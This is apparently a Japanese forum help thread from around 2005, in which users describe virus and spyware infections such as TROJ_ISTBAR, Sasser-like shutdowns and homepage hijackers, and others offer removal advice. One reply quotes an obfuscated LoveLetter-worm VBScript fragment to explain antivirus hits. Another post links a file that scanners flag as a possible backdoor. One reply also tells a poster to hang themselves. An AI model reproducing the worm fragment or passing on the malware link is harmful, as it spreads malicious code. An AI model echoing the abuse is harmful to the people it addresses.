【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 ウィルスバスター 2005
【ちゃんとUpdateしてるか】 毎日Updateしています。
【スキャンした結果（ウイルス名・発見場所）】
ウイルスは発見されませんでした。
【症状を具体的に、分かる限りすべて書く】
使用しているウインドウが突然非アクティブ状態になってしまいます。
タスクマネージャでプロセスを見ていると５〜６分に１度何かのプログラムが走っているようです。
それと同時に「C:\WINNT\system32」のフォルダ内に「3r8pcbn9.html」というhtmlファイルが作られていました。
ｈｔｍｌファイルをテキストエディタで開いてみましたが何も書かれていませんでした。

【何をしたらそんなことになったのか】
原因は不明です。
【これまでにとった措置】
ウイルスバスター２００５、Ｓｐｙbot(共にＵｐｄａｔｅ済）でスキャンしましたが問題はありませんでした。
googleで同じような症状を検索してみましたが、探し方が不味いのか回答となるようなページが
引っかかりませんでした。

宜しくお願いします。

SE1R78 07.12.2005
↑が貼られてたのですがこれは何ですか。

　　　 　 　　rn　　
　　　　 ／￣･ヽ 　　　　　＜と、いうわけ
　　　　・､＿　ノ　／ ￣ヽ　
　　　　（__）⊂ヽ/　 ,-､　 ）　
　　　　 （＿＿_）__人＿ノ　
　　　 　 ~ ~　

教えてください。カスペルスキーを導入してから日に数回「Helkern」に攻撃されてます。
撃退されてますが、なんだか気持ち悪いです。
何か良い対処法を教えてください。

　 ∧＿∧
　（　´∀｀）　　
　（　　　　）　
　｜ ｜ ｜　　
　（_＿）___）

>>713
http://www.altech-ads.com/product/10001114.htm

>>716
SQL Slammerでしょ。セッションレスのExploitです。
そもそも個人PCでSQL Serverを使ってる人なんておよそ居ないと思うんで
関係ないです。ルータを導入してますか。

パッチを当て既知のセキュリティーホールを塞ぎ、拡張子の偽装は別として
jpg画像をヴュワーで閲覧しただけで感染するウィルスは現在確認されていますか？

【使用OS】 XP　PRO
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】 ウイルスバスター２００５
【ちゃんとUpdateしてるか】 はい
【スキャンした結果（ウイルス名・発見場所）】 おぼえてない
【別のオンラインスキャンしたならその結果は】 未スキャン
【症状を具体的に、分かる限りすべて書く】
「おまえが踏まなきゃ誰が踏む」というダイアログ表示。
「うららうららうらうらら」（山本リンダ）というBGM付きで。
リカバリー後もｎｙを立ち上げようとすると
ウイルスバスター２００５が反応する
そのため、ｎｙができない
【何をしたらそんなことになったのか】 ？
【これまでにとった措置】
リカバリー
【その他の質問】
OSのクリーンインストールでOK？
正式なウイルス名・対処法教えてください

>>719
>>1を読んで

>>718
ない

>>717
レスありがとうございます。
難しすぎて私にはさっぱり分かりませんが、気にしなくて良いってことですか？

>>718
W32/Perrun

>>717
アドバイスありがとうございます。
紹介して頂いたソフトで何のプログラムが動いているのか確認してみます。

今　実況�dでる？

ウイルスの除去方法を教えてください。

【使用OS】ＸＰ
【スキャンした結果（ウイルス名・発見場所）】 TROJ_ISTBAR>GG
【別のオンラインスキャンしたならその結果は】 オンラインスキャンのみで発見
【症状を具体的に、分かる限りすべて書く】 ちょっと重い
【何をしたらそんなことになったのか】 ファイルのダウンロード・・？
【これまでにとった措置】 コントロールパネルでistv (?)　を削除
【その他の質問】
トレンドマイクロのＨＰでウイルスを探しましたが、ＧＧは乗ってませんでした。
誰か教えてください。

もう一回
省略するでない。

bravehostってそんなやばいんすか？被害とかくわしいかたいますか？

>>728
>>1

すいません　抜けてました。
使用OS】 ＸＰ
【WindowsUpdateしてるか】してる
【AntiVirusは何を使っているか】ウイルスバスター２００６
【ちゃんとUpdateしてるか】 はい
【スキャンした結果（ウイルス名・発見場所）】 TROJ_ISTBAR.GG
【別のオンラインスキャンしたならその結果は】 していない
【症状を具体的に、分かる限りすべて書く】 ちょっと重い
【何をしたらそんなことになったのか】 ダウンロード・・？詳しくは不明
【これまでにとった措置】 コントロールパネルでistv(?)を削除
【その他の質問】
トレンドマイクロのＨＰでウイルスを探しましたが、ＧＧは乗ってませんでした。
誰か教えてください。

これでわかるでしょうか？

nyやってる奴はここに来るべきではない。
どうすればいいのか分からない時は、素直にOSリカバリしろ。

それでも駄目な場合は、パソコン捨てちまえ。
二度とネットに繋ぐな。

使用OSMe
ウィルスバスター2005
アップデートは感染後
メモリを埋め尽くした後にページファイルを埋めていくらしくチェック不可
起動後5分〜10分で↑の症状
フレッツ接続ツールとウイルスバスターの相性が悪く、常駐させずオンラインでアプリのダウンロード
感染発症後にソフト常駐させるも反応無し、セーフモードでも発症ファイルチェック不可

よろしくおねがいします

リカバリのみ

メインドライブの空き容量が目に見えて減っていくのが恐くて
埋まりきる前に電源を切ってたんですが
そのまま放置してみたところ残り600MBぐらいで回復して
ウィルスチェックもできるようになりました、すみません

>>732
・接続にルーターを使うようにしてみたらどうか？
・出来ればWinXPにしたら？

>731
何も知らん、アドバイスも出来んくせに
能書きたれるなカス！
さっさと回線切って
首吊って氏ね

アドバイスは「素直にリカバリしろ」ってとこだろ。別に間違ってないと思うよ。

リカバリを知らないんだよ、きっと。

virustotalでの検知いいね〜
いろいろなメーカーのウイルス対策ソフトの比較になる。
スパイウェアではnod32とkaspaskyが検知率高い！

>737
>738
馬鹿かお前ら
お前ら、メーカーパソコンしか使った事ないだろ？
そんな猿でも分かる答えなんか期待してない

>740
メーカーパソコンとか関係ないでしょ･･･
悪質なウィルスにつかまったら、リカバリしかなくなる事だってあるじゃない。
人のアドバイス気に食わないなら、黙って自分で駆除方法探しなよ。

>740
じゃぁ、窓から投げ捨てるといいんじゃない？

【使用OS】 Windows XP
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 BitDefender 9
【ちゃんとUpdateしてるか】 してます
【スキャンした結果（ウイルス名・発見場所）】 Trojan.downloder.small.wv とviploader??
【別のオンラインスキャンしたならその結果は】 何も検出されませんでした
【症状を具体的に、分かる限りすべて書く】 インターネット接続がよく突然切れるようになった
　　　　　　　　　　　　　　　　　　　　　パソコンが何をするにもすごい重い
　　　　　　　　　　　　　　　　　　　　　
【何をしたらそんなことになったのか】 わかりません
【これまでにとった措置】 Bit defender.Ad-Aware.a-squared.MicrosoftAntiSpyware
Hijack Thisでバカみたいにスキャン&削除しました。
　　　　　　　　　　　　上に書いたトロイは見つけることが出来るんですけど
　　　　　　　　　　　　削除できません。
【その他の質問】 どうかたすけてください(´・ω・｀)よろしくお願いします。

セーフモードで削除

　　　,ｨ'ヽ､　　,r'"￣｀ﾞヽ' 助けてください。
　　　ヾ、 ヽ､/ ･　　･ 　 ';　　　　　Trojan.StartPage に感染しているのですがスキャンして検出後駆除しているにも
　　　　　`ヽ､｀ヽ　　　　　l　　　　　かかわらず、インターネットを立ち上げると必ず「ノートンがウイルスを検出して
　　　　　__,.-' ノ　　　　　 |　　　　　削除しました」と表示されるのに、必ず出てきます。
　　　　（_,. -１　　　　　　,!　　　　　
　　　　　　　 ゝ、＿＿,ノ　　　　　　どこかに潜んでいて、インターネットを立ち上げるたびに出現するようです。
　　　　　　　　　　　　　　　　　　　　ホームページも置き換わります。ひっつこいヤツで困っています。
　　　　　　　　　　　　　　　　　　　　どうかご指導をよろしくお願いします

>>745
マルチ乙。

>>745

　　　　　　　　　　　i::::::::/'"￣￣ヾi
　　　　　　　　　　　|:::::::|　,,,,,_　 ,,,,,,|　
　　　　　　　　　　　|r-==（　｡);（　｡)　　　
　　　　　　　　　　　(　ヽ　　:::__)..:: }
　 　 　 　 ,＿＿__／ヽ　　ー==　;　 ほほう　それでそれで？
　　　　 r'"ヽ　　 t､　 　＼＿＿_ !
　　　　/ ､､i　　　 ヽ＿＿,,/
　　　 /　ヽﾉ　　j　,　　　j　|ヽ　
　　　 |⌒`'､__ /　/　　　/r　 |
　　　 {　　　　￣''ｰ-､,,_,ﾍ＾　|
　　　　ゝ-,,,＿＿＿＿_）--､j
　　　 /　　＼__　　　　 　　/
　　 　|　 　　 　"'ｰ‐‐---''

偽のaboutblankにホームを変更されてしまうスパイウェアに感染しました。フリーのスパイボットやアドウェアを用いてスキャンして削除しましたが効果ありません。
有料のやつでabout・blank・search・for型に対応できるやつを知っていましたら教えてください。
あとリカバリしたとすれば購入時についてたソフトを使ってWordやExcelも復活できますか？ＸＰのソフトはあるのですがWordなどはないです。Personal云々とかいうソフトはありました。初心者すぎる質問ですみません。

　 ∧＿∧
　（　´∀｀）　　／￣￣￣￣￣
　（　　　　）　＜　>>748
　｜ ｜ ｜　　＼＿＿＿＿＿
　（_＿）___）

http://www.higaitaisaku.com/removeaboutblank.html

あと、OfficeのCDは購入時に付いてきませんでしたか。
そのPersonalはOffice Personalではないのですか。

＞そのPersonalはOffice Personalではないのですか。

たしかそうでした。

ご提示のサイトは自力で発見し、自分のスパイウェアがabout・blank・search・for型と知りました。
が、02などのログをスキャンする作業からが難しすぎて分からないので、できるだけ対策ソフトで解決したかったので、上の書き込みをしました。
そして、僕は仕事でパソコンを使ったりとかではないので、マイドキュメント内の写真やレポート少々さえ残ればいいので、リカバリをしてもいいかなと考えました。
どうすればいいのかアドバイスください。

PCの説明書みた方がいいよ

　 ∧＿∧
　（　´∀｀）　　／￣￣￣￣￣
　（　　　　）　＜　>>750
　｜ ｜ ｜　　＼＿＿＿＿＿
　（_＿）___）

それでしたら、必要なデータ類をバックアップした後に
リカバリをかけて下さい。データ類を戻すときには念のため
スキャンにかけて下さい。

>>751　>>752

ありがとうございました。説明書見ながらやってみます。ありがとうございました。
メーカー製のパソコンを買っててよかったです。

【使用OS】WindowsXP Home
【WindowsUpdateしてるか】はい
【AntiVirusは何を使っているか】Antivir ver6
【ちゃんとUpdateしてるか】はい
【スキャンした結果（ウイルス名・発見場所）】
C:\WINDOWS\nxstinst.exe は　SecurityRisk.NavHelper に感染しています。
C:\WINDOWS\remover.dll は　SecurityRisk.NavHelper に感染しています。
【別のオンラインスキャンしたならその結果は】シマンテックオンラインスキャンで上のファイルを検出
【症状を具体的に、分かる限りすべて書く】特になし
【何をしたらそんなことになったのか】いつのまにか
【これまでにとった措置】googleで検索
【その他の質問】

この前変なURL踏んで気になったのでオンラインスキャンしてみたんですが、97個の感染ファイルが出ました
そのうちの二つなんですが、これは何なんでしょうか？nxstinst.exe と remover.dll をgoogleで検索しましたが
日本語ではほとんどヒットしませんでした。どうすればいいでしょうか？

あと、97個の感染ファイルのうち、上の二つ以外は全てOpenJaneの2chのログだったんですが
これは放置しても大丈夫でしょうか？

お願いします

NavExcel　　BHO

> どうすればいいでしょうか？
設定の項目でRepair with prompt、Delete with promptの順に設定しておけばいいんじゃね？
削除できない場合は、セーフモードで。

> 上の二つ以外は全てOpenJaneの2chのログだった
２ちゃんねるに貼られた　c.C,o,p,y,(d,i,r,s,y,s,t,e,m,&"\L,O,V,E,-,L,E,T,T,E,R,-,F,O,R,,-,Y,O,U.T,X,T.v,b,s,")
こういうのに反応していると思われる。

【使用OS】WindowsXP
【WindowsUpdateしてるか】はい
【AntiVirusは何を使っているか】ノートン2004　BitDefender
【ちゃんとUpdateしてるか】ノートンのみ2ヶ月弱してません
【スキャンした結果（ウイルス名・発見場所）】
発見場所　→　C:\WINDOWS\SYSTEM32\cd_clint.dll
ウイルス名→　Spyware:spyware/cydoor
【別のオンラインスキャンしたならその結果は】
　　ノートン･BitDefender･ウイルスオンラインスキャンをやってみて
　　Pandaオンラインスキャンをした所このスパイウェアを検出しましたが
　　駆除できませんでした。
【症状を具体的に、分かる限りすべて書く】
　　･症状は今の所何もありませんが不安だったので書き込みしました。
　　･dllファイルはむやみに削除してはいけないと聞いたので
　　 対処法を教えて頂けたら幸いです。
　　･このファイルは購入以前から存在していたファイルでした。
【何をしたらそんなことになったのか】いつのまにか感染してました
【これまでにとった措置】グーグル。ウイルススキャンのみです
【その他の質問】ありません。

>>757
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-adware.cydoor.html

>>758さん
レスありがとうございます。
サイトを参考にいろいろやってみます。

>>755
よくわかりません・・・すいません
>>756
すいません、書き忘れてたんですが、Antivirの方でスキャンしても何も検出しないんです
何のファイルかわからないんですがファイルを直接削除したらまずいですかね・・・？

どなたかお願いします。少し泣いてしまいそうです。

【使用OS】 windowsXP　Home　Edition
【WindowsUpdateしてるか】 いいえ。
【AntiVirusは何を使っているか】 ノートン2002
【ちゃんとUpdateしてるか】 いいえ。
【スキャンした結果（ウイルス名・発見場所）】スキャンしてみたものの見つからず。
【別のオンラインスキャンしたならその結果は】していません。

【症状を具体的に、分かる限りすべて書く】 
>>7のような症状で、シャットダウンのカウントダウンが始まり、
「AUTHORTY\SYSTEMによりLSA　Shell（Export Version)を終了します」と出て、
「システムプロセスC:\WINDOW\System32\lsass.exe'」と表示されます。

【何をしたらそんなことになったのか】 
中古で買い、インターネットに接続しようとするとシャットダウンのカウントが始まるため
インターネットには長く繋げず、オンラインスキャンやUpdateが途中で終了されてしまいます。

【これまでにとった措置】 
スキャンでは見つかりませんでした。
リカバリもしてみましたが治りません。
Sasserかと思い、セーフモードで削除しようと試みましたが、avserve.exeなどのファイルが見つからず。

【その他の質問】 
シャットダウンのカウントダウンを９９９９にするという方法をしようとしたのですが
コンピュータ名が空欄で、参照が機能せず。正しいコンピュータ名を見るにはどうしたらいいのでしょう？
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\SysProcs
にlsass.exeというファイルがあったのですが、これは消してもいいのでしょうか？

>>761 >リカバリもしてみましたが治りません。

そりゃいつまでたっても直らねーよ。裸同然だもの。
すぐ最新のセキュリティーソフト買ってこいよ。
で、ネット切り離してリカバリしてセキュソフトインスコな。
FW効かせてからネットに繋ぐ。
WtnとセキュのUpdate。必ずXPsp2Iにすること
ルーターがつくならそれも入れとけ。

　　かんがってやってみ。

WtnとXPsp2I　ってなんだべ？

Win XPsp2 な。

>>762
ありがとうございます。がんばってみます。

http://strawberry.web-sv.com/Sn2/up3/2.html?1134234277

straw2968.zip (同人誌) [AKKAN-Bi PROJECT (柳ひろひこ)] ACTG1･2.zip 6.2MB 05/12/10(Sat),02:55:16 application/x-zip-compressed

このウィルスってなんですか？
対処法を教えてください。

> このウィルスってなんですか？

AntiVir6.33.0.6112.09.2005no virus found
Avast4.6.695.012.10.2005no virus found
AVG71812.08.2005no virus found
Avira6.33.0.6112.09.2005no virus found
BitDefender7.212.10.2005no virus found
CAT-QuickHeal8.0012.09.2005no virus found
ClamAVdevel-2005110812.09.2005no virus found
DrWeb4.3312.10.2005no virus found
eTrust-Iris7.1.194.012.09.2005no virus found
eTrust-Vet11.9.1.012.09.2005no virus found
Fortinet2.54.0.012.10.2005no virus found
F-Prot3.16c12.09.2005no virus found
Ikarus0.2.59.012.10.2005no virus found
Kaspersky4.0.2.2412.10.2005no virus found
McAfee464712.09.2005no virus found
NOD32v21.131712.09.2005no virus found
Norman5.70.1012.09.2005no virus found
Panda8.02.0012.10.2005no virus found
Sophos4.00.012.10.2005no virus found
Symantec8.012.10.2005no virus found
TheHacker5.9.1.05212.09.2005no virus found
VBA323.10.512.10.2005suspected of Backdoor.Delf.13

> 対処法を教えてください。
実行しない。
実行しても泣かない。
Microsoft Virtual PC 2004等を使う。
レジストリ等を監視し、すぐに戻せる環境で実行する。

（　＾３＾）≡○

　ﾋﾘﾋﾘ 《（　´；ω；） ．．．○

http://www5e.biglobe.ne.jp/~morizza/mikan.html

リカバリは大変そうなのでダメモトで有料のアンチスパイという対策ソフトを購入してみたら、症状は改善しました。
スキャンに４０分かかって、悪性クッキーが１個とトロイが３３個とハイジャッカーが１５個という半端ない数のウィルススパイウェアが検出されて、驚きでした。
が、症状は治っておらず一時はガッカリしましたが、メモリに入ってるんじゃないかと思って、気を取り直して再起動してセーフモードでもう一度スキャンするとまた３個も引っかかり、削除した結果、症状は改善されました。

別に僕はソフト会社の回し者ではありませんが、フリーのものとはスキャンの質が全然違うと思います。事実、フリーのものは５，６分で終わりますし。

アドバイスくれた方、ありがとうございました。

>>771
『リカバリ』まで読んだ。

>>771
「僕はソフト会社の回し者」 まで読んだ

　　　　　　 ∧∧　　
〜′￣￣( ﾟДﾟ)
　UU￣￣　U U　　

目で見える形のウィルスやスパイウェアに感染しないと、とっくにそれまで感染していても全然気付かないタイプ。
結局WindowsUpdateなんて関心がない。
誰も相手にしないから震度家。

(´･ω･｀)知らんがな